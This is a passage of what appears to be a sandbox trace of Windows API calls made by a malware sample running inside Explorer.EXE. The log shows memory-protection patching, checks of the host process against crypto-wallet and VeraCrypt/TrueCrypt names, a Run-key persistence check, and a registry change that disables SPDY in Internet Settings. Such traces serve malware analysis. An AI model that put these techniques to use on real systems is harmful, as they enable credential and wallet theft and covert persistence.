hProcess=0xffffffffffffffff, lpAddress=0x7ff961560000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961560000, AllocationBase=0x7ff961560000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.004] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.005] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9614d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9614d0000, AllocationBase=0x7ff9614d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.005] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.005] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff961280000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff961280000, AllocationBase=0x7ff961280000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.005] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.005] VirtualProtect (in: lpAddress=0x7ff9613558a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0209.006] VirtualProtect (in: lpAddress=0x7ff9613558a0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0209.007] VirtualProtect (in: lpAddress=0x7ff961355870, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0209.008] VirtualProtect (in: lpAddress=0x7ff961355870, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0209.008] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9687b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9687b0000, AllocationBase=0x7ff9687b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.008] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.009] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968780000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff968780000, AllocationBase=0x7ff968780000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.009] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.009] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9610c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9610c0000, AllocationBase=0x7ff9610c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.009] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.009] VirtualProtect (in: lpAddress=0x7ff9610f3428, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0209.010] VirtualProtect (in: lpAddress=0x7ff9610f3428, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0209.010] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c6d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c6d0000, AllocationBase=0x7ff96c6d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.010] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.010] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c690000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c690000, AllocationBase=0x7ff96c690000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.010] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.010] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c700000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c700000, AllocationBase=0x7ff96c700000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.010] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.011] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f5d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f5d0000, AllocationBase=0x7ff96f5d0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.011] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.011] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f5b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f5b0000, AllocationBase=0x7ff96f5b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.011] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.011] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96d320000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96d320000, AllocationBase=0x7ff96d320000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.011] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.011] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c670000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c670000, AllocationBase=0x7ff96c670000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.011] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.011] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c630000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c630000, AllocationBase=0x7ff96c630000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.011] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.012] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972800000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972800000, AllocationBase=0x7ff972800000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.012] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.012] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c5f0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c5f0000, AllocationBase=0x7ff96c5f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.012] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.012] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96c020000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96c020000, AllocationBase=0x7ff96c020000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.012] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.012] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96bfc0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96bfc0000, AllocationBase=0x7ff96bfc0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.012] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.013] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff960c20000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff960c20000, AllocationBase=0x7ff960c20000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.013] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.013] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973180000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973180000, AllocationBase=0x7ff973180000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.013] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.014] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972450000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972450000, AllocationBase=0x7ff972450000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.014] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.014] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9723b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9723b0000, AllocationBase=0x7ff9723b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.014] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.014] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972370000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972370000, AllocationBase=0x7ff972370000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.014] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.015] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96cde0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96cde0000, AllocationBase=0x7ff96cde0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.015] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.015] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965900000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965900000, AllocationBase=0x7ff965900000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.015] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.015] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff965950000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff965950000, AllocationBase=0x7ff965950000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.015] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.015] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972350000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972350000, AllocationBase=0x7ff972350000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.015] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.015] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f280000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f280000, AllocationBase=0x7ff96f280000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.016] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.016] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972240000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972240000, AllocationBase=0x7ff972240000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.016] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.016] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977820000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977820000, AllocationBase=0x7ff977820000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.016] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0209.016] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7aae480, nSize=0x104 | out: lpFilename="C:\\Windows\\Explorer.EXE" (normalized: "c:\\windows\\explorer.exe")) returned 0x17 [0209.017] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrStrIW") returned 0x7ff97736b260 [0209.017] StrStrIW (lpFirst="C:\\Windows\\Explorer.EXE", lpSrch="electrum-") returned 0x0 [0209.017] StrStrIW (lpFirst="C:\\Windows\\Explorer.EXE", lpSrch="bitcoin") returned 0x0 [0209.017] StrStrIW (lpFirst="C:\\Windows\\Explorer.EXE", lpSrch="multibit-hd") returned 0x0 [0209.017] StrStrIW (lpFirst="C:\\Windows\\Explorer.EXE", lpSrch="bither") returned 0x0 [0209.017] StrStrIW (lpFirst="C:\\Windows\\Explorer.EXE", lpSrch="msigna.") returned 0x0 [0209.017] StrStrIW (lpFirst="C:\\Windows\\Explorer.EXE", lpSrch="Jaxx.") returned 0x0 [0209.017] StrStrIW (lpFirst="C:\\Windows\\Explorer.EXE", lpSrch="JEdudus.") returned 0x0 [0209.017] StrStrIW (lpFirst="C:\\Windows\\Explorer.EXE", lpSrch="armory-") returned 0x0 [0209.017] StrStrIW (lpFirst="C:\\Windows\\Explorer.EXE", lpSrch="veracrypt") returned 0x0 [0209.017] StrStrIW (lpFirst="C:\\Windows\\Explorer.EXE", lpSrch="truecrypt") returned 0x0 [0209.017] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x235f590 | out: phkResult=0x235f590*=0x1350) returned 0x0 [0209.017] RegQueryValueExA (in: hKey=0x1350, lpValueName="Install", lpReserved=0x0, lpType=0x235f500, lpData=0x0, lpcbData=0x235f580*=0x74 | out: lpType=0x235f500*=0x3, lpData=0x0, lpcbData=0x235f580*=0x76) returned 0x0 [0209.017] RegQueryValueExA (in: hKey=0x1350, lpValueName="Install", lpReserved=0x0, lpType=0x235f500, lpData=0x7aafe40, lpcbData=0x235f580*=0x76 | out: lpType=0x235f500*=0x3, lpData=0x7aafe40*, lpcbData=0x235f580*=0x76) returned 0x0 [0209.018] RegCloseKey (hKey=0x1350) returned 0x0 [0209.018] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw\\autoclb.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1350 [0209.018] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0x235f4f8 | out: phkResult=0x235f4f8*=0x1354) returned 0x0 [0209.018] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegEnumValueW") returned 0x7ff976f97220 [0209.018] RegEnumValueW (in: hKey=0x1354, dwIndex=0x0, lpValueName=0x7aae690, lpcchValueName=0x235f4f0, lpReserved=0x0, lpType=0x235f4f4, lpData=0x7aae898, lpcbData=0x235f548 | out: lpValueName="cabilipc", lpcchValueName=0x235f4f0, lpType=0x235f4f4, lpData=0x7aae898, lpcbData=0x235f548) returned 0x0 [0209.018] StrStrIW (lpFirst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpSrch="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" [0209.018] RegCloseKey (hKey=0x1354) returned 0x0 [0209.018] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", phkResult=0x235f5e0 | out: phkResult=0x235f5e0*=0x1354) returned 0x0 [0209.019] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegSetValueExA") returned 0x7ff976f82680 [0209.019] RegSetValueExA (in: hKey=0x1354, lpValueName="EnableSPDY3_0", Reserved=0x0, dwType=0x4, lpData=0x235f5d8*=0x0, cbData=0x4 | out: lpData=0x235f5d8*=0x0) returned 0x0 [0209.019] RegCloseKey (hKey=0x1354) returned 0x0 [0209.020] GetModuleHandleA (lpModuleName="kernelbase") returned 0x7ff9753d0000 [0209.020] lstrcmpA (lpString1="AccessCheck", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AccessCheckByType", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AcquireSRWLockExclusive", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AcquireSRWLockShared", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AcquireStateLock", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="ActivateActCtx", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddAce", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddAuditAccessAce", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddAuditAccessAceEx", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddAuditAccessObjectAce", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddDllDirectory", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddMandatoryAce", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddRefActCtx", lpString2="RegGetValueW") returned -1 [0209.020] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AddVectoredContinueHandler", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AddVectoredExceptionHandler", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AdjustTokenGroups", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AdjustTokenPrivileges", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AllocConsole", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AllocateAndInitializeSid", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AllocateLocallyUniqueId", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppContainerDeriveSidFromMoniker", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppContainerFreeMemory", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppContainerLookupDisplayNameMrtReference", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppContainerLookupMoniker", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppContainerRegisterSid", lpString2="RegGetValueW") returned -1 [0209.021] lstrcmpA (lpString1="AppContainerUnregisterSid", lpString2="RegGetValueW") 